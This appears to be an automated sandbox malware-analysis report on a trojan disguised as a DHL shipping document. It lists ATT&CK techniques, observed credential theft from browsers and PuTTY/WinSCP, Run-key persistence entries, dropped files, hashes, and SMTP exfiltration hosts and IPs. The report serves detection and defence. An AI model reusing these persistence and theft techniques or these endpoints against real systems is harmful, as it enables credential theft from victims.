                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation
                  11
                  Registry Run Keys / Startup Folder
                  311
                  Process Injection
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  Account Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  PowerShell
                  Boot or Logon Initialization Scripts11
                  Registry Run Keys / Startup Folder
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Credentials in Registry
                  1
                  File and Directory Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  Exfiltration Over Bluetooth11
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager114
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  Automated Exfiltration1
                  Non-Standard Port
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Masquerading
                  NTDS211
                  Security Software Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                  Virtualization/Sandbox Evasion
                  LSA Secrets1
                  Process Discovery
                  SSHKeyloggingData Transfer Size Limits23
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common311
                  Process Injection
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Hidden Files and Directories
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Owner/User Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                  System Network Configuration Discovery
                  Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830438 Sample: DHL_Shipping_Document2.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 46 us2.smtp.mailhostbox.com 2->46 48 smtp.thanhphoung-vn.com 2->48 50 203.215.12.0.in-addr.arpa 2->50 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 6 other signatures 2->74 8 DHL_Shipping_Document2.exe 1 8 2->8         started        12 KbWSe.exe 2->12         started        15 explorers.exe 2 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 38 C:\Users\user\AppData\Local\explorers.exe, PE32+ 8->38 dropped 40 C:\Users\...\Lutyzivrgpnlssvvvftlfile.exe, PE32 8->40 dropped 42 C:\Users\...\explorers.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\...\DHL_Shipping_Document2.exe.log, ASCII 8->44 dropped 86 Encrypted powershell cmdline option found 8->86 88 Creates multiple autostart registry keys 8->88 90 Writes to foreign memory regions 8->90 104 2 other signatures 8->104 19 Lutyzivrgpnlssvvvftlfile.exe 17 9 8->19         started        24 cmd.exe 1 8->24         started        26 powershell.exe 13 8->26         started        28 InstallUtil.exe 8->28         started        58 208.91.198.143, 49702, 49704, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->58 60 104.237.62.211, 443, 49700 WEBNXUS United States 12->60 66 4 other IPs or domains 12->66 92 Antivirus detection for dropped file 12->92 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->94 96 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->96 106 3 other signatures 12->106 98 Multi AV Scanner detection for dropped file 15->98 100 Machine Learning detection for dropped file 15->100 62 api4.ipify.org 17->62 64 api.ipify.org 17->64 102 Tries to harvest and steal browser information (history, passwords, etc) 17->102 file6 signatures7 process8 dnsIp9 52 208.91.199.225, 49699, 49703, 587 PUBLIC-DOMAIN-REGISTRYUS United States 19->52 54 api4.ipify.org 173.231.16.76, 443, 49697, 49701 WEBNXUS United States 19->54 56 4 other IPs or domains 19->56 36 C:\Users\user\AppData\Roaming\...\KbWSe.exe, PE32 19->36 dropped 76 Antivirus detection for dropped file 19->76 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->80 84 7 other signatures 19->84 82 Encrypted powershell cmdline option found 24->82 30 powershell.exe 15 24->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        file10 signatures11 process12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  DHL_Shipping_Document2.exe38%ReversingLabsWin64.Trojan.Leonem
                  DHL_Shipping_Document2.exe33%VirustotalBrowse
                  DHL_Shipping_Document2.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%AviraTR/Spy.Gen8
                  C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe100%AviraTR/Spy.Gen8
                  C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\explorers.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\explorers.exe38%ReversingLabsWin64.Trojan.Leonem
                  SourceDetectionScannerLabelLinkDownload
                  15.0.Lutyzivrgpnlssvvvftlfile.exe.a0000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                  17.2.InstallUtil.exe.400000.0.unpack100%AviraHEUR/AGEN.1235860Download File
                  SourceDetectionScannerLabelLink
                  203.215.12.0.in-addr.arpa0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  https://urn.to/r/sds_see0%URL Reputationsafe
                  http://smtp.thanhphoung-vn.com0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  208.91.199.223
                  truefalse
                    high
                    api4.ipify.org
                    173.231.16.76
                    truefalse
                      high
                      smtp.thanhphoung-vn.com
                      unknown
                      unknownfalse
                        unknown
                        203.215.12.0.in-addr.arpa
                        unknown
                        unknownfalseunknown
                        api.ipify.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.google.com/intl/en_uk/chrome/GoogleInstallUtil.exe, 00000011.00000002.552825754.0000029417EBF000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                              high
                              https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                high
                                https://duckduckgo.com/ac/?q=Xubyeworypu.tmpdb.17.drfalse
                                  high
                                  https://stackoverflow.com/q/14436606/23354InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                        high
                                        https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=cLfzmsuaggmw.tmpdb.17.drfalse
                                          high
                                          http://us2.smtp.mailhostbox.comLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DAInstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                              high
                                              https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleInstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                                high
                                                https://github.com/mgravell/protobuf-netInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://search.yahoo.com?fr=crmas_sfpfInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Xubyeworypu.tmpdb.17.drfalse
                                                      high
                                                      https://www.newtonsoft.com/jsonexplorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://smtp.thanhphoung-vn.comLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023CC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                          high
                                                          https://support.google.com/chrome?p=update_errorFixLfzmsuaggmw.tmpdb.17.drfalse
                                                            high
                                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                              high
                                                              https://support.google.com/chrome/answer/6315198?product=Lfzmsuaggmw.tmpdb.17.drfalse
                                                                high
                                                                http://james.newtonking.com/projects/jsonDHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D72000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A029000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://support.google.com/installer/?product=Lfzmsuaggmw.tmpdb.17.drfalse
                                                                  high
                                                                  https://support.google.com/chrome?p=update_error8InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=Xubyeworypu.tmpdb.17.drfalse
                                                                      high
                                                                      https://search.yahoo.com?fr=crmas_sfpInstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drfalse
                                                                        high
                                                                        https://www.google.com/intl/en_uk/chrome/8InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.ipify.orgLutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/mgravell/protobuf-netiInstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erroLfzmsuaggmw.tmpdb.17.drfalse
                                                                                high
                                                                                https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsLfzmsuaggmw.tmpdb.17.drfalse
                                                                                  high
                                                                                  https://stackoverflow.com/q/11564914/23354;InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://stackoverflow.com/q/2152978/23354InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/intl/en_uk/chrome/Lfzmsuaggmw.tmpdb.17.drfalse
                                                                                        high
                                                                                        https://www.newtonsoft.com/jsonschemaexplorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.codeplex.com/DotNetZipInstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.nuget.org/packages/Newtonsoft.Json.BsonDHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://urn.to/r/sds_seeDHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://support.google.com/chrome?p=update_errorInstallUtil.exe, 00000011.00000002.552825754.0000029417E9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417ED8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417DA1000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Xubyeworypu.tmpdb.17.drfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    208.91.198.143
                                                                                                    unknownUnited States
                                                                                                    394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                    104.237.62.211
                                                                                                    unknownUnited States
                                                                                                    18450WEBNXUSfalse
                                                                                                    208.91.199.225
                                                                                                    unknownUnited States
                                                                                                    394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                    208.91.199.223
                                                                                                    us2.smtp.mailhostbox.comUnited States
                                                                                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                    173.231.16.76
                                                                                                    api4.ipify.orgUnited States
                                                                                                    18450WEBNXUSfalse
                                                                                                    IP
                                                                                                    192.168.2.1
                                                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                                                    Analysis ID:830438
                                                                                                    Start date and time:2023-03-20 11:32:07 +01:00
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 0s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:light
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:24
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample file name:DHL_Shipping_Document2.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@17/19@19/6
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 80%
                                                                                                    HDC Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 56%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                    • TCP Packets have been reduced to 100
                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                    • Execution Graph export aborted for target InstallUtil.exe, PID 1764 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    TimeTypeDescription
                                                                                                    11:33:43API Interceptor72x Sleep call for process: powershell.exe modified
                                                                                                    11:34:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    11:34:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    11:34:20API Interceptor48x Sleep call for process: Lutyzivrgpnlssvvvftlfile.exe modified
                                                                                                    11:34:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorers "C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    11:34:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KbWSe C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    11:35:07API Interceptor98x Sleep call for process: KbWSe.exe modified
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):1822
                                                                                                    Entropy (8bit):5.336325892766998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MxHKqmHKww+4YHKGD8AoPtHTG1hAHKKPwayHKHK2uTHKIgiqHKl:iq9qBYqGgAoPtzG1eqKPQqqLqIgVql
                                                                                                    MD5:85468146CC471012E4D4ABA011818DFF
                                                                                                    SHA1:85E2FBF5FF39B0252076FEDB8DB82829EB7C6064
                                                                                                    SHA-256:EF85B0C2AE1A545DF1841D8C1892AECD31782FD6E0648822DD681214B53F42FD
                                                                                                    SHA-512:F0FAF6000F4F4D5751E132DEE26322603EB7BDE867ECA589268FD9D24D6D84E8382952C2D6A4D8460F425EAF38D121C3FBF2330C94B342DD82089E80DE4857B4
                                                                                                    Malicious:true
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\773cde8eca09561aeac8ad051c091203\System.Transactions.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):147456
                                                                                                    Entropy (8bit):0.7217007190866341
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                    MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                    SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                    SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                    SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171520
                                                                                                    Entropy (8bit):6.183577945077043
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                                                                                    MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                    SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                                                                                    SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                                                                                    SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
